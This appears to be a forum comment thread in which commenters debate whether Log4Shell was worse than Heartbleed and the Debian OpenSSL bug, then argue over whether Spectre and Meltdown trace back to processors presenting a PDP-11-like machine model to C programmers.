It seems almost impossible to say if log4shell was bigger or more costly than Heartbleed or the Debian OpenSSL bug (there are probably still keys out there made with the damaged randomness). Log4shell is just in recent memory.
> It seems almost impossible to say if log4shell was bigger or more costly than Heartbleed or the Debian OpenSSL bug (there are probably still keys out there made with the damaged randomness). Log4shell is just in recent memory.
Seems pretty clear to me - Heartbleed (and all the other serious memory exploits) required a great deal of skill and a lot of luck to exploit, and in return you either don't get a remote execution, or you get a very tiny chance of a remote execution.
In comparison, log4j is about as easy to exploit into an RCE as it is to use curl.
Log4j is a guaranteed remote-execution exploit just by filling in a user facing form with the correct URL, while memory exploits are not guaranteed to result in an RCE, requires more skill than simply typing into an input box or an email.
> Log4j is a guaranteed remote-execution exploit just by filling in a user facing form with the correct URL
This is only true of systems that were using very outdated JVM versions... on the newer ones (we're talking 2016 or newer JDK releases, not like last month), you would need to pull off a serialization exploit to indirectly get RCE, which is quite a bit harder than sending a HTTP request.
> Heartbleed (and all the other serious memory exploits) required a great deal of skill and a lot of luck to exploit, and in return you either don't get a remote execution, or you get a very tiny chance of a remote execution.
Heartbleed wasn't about RCE at all. It was about memory disclosure -- memory that contained secret signing keys. The fallout was that keys needed to be revoked and rotated.
Reading out memory and extracting the secret keys was actually pretty simple. There were multiple POCs available.
"The root cause of the Spectre and Meltdown vulnerabilities was that processor architects were trying to build not just fast processors, but fast processors that expose the same abstract machine as a PDP-11. This is essential because it allows C programmers to continue in the belief that their language is close to the underlying hardware."
Just because an academicist has an opinion does not make it fact. That quote reads like a blogpost and with its lack of citation it might as well be. Yes, it sounds plausible. but well.
Let's assume it's true: your argument would be "intel made a mistake, but since they would have only made that mistake when doing stuff that appeases C programmers (would they have?), it's actually because of C."
Now, I think this is a bit of a stretch.
ETA: or did you mean that it has to do with C for that reason? in which case, ok, I see how you mean.
Oh yea, if not for emulating the PDP-11, processor designers would have no interest in instruction level parallelism.
This article is pretty funny actually:
> On a modern high-end core, the register rename engine is one of the largest consumers of die area and power. To make matters worse, it cannot be turned off or power gated while any instructions are running
Yea, let's just gate off the RAT. What's it for again?
Java exposed the same abstract machine as a PDP-11 too. The key "PDP-11" thing is that all memory is treated as equally accessible, rather than the reality - i.e. that some memory is in caches on certain cores only and can therefore be accessed more efficiently on those cores.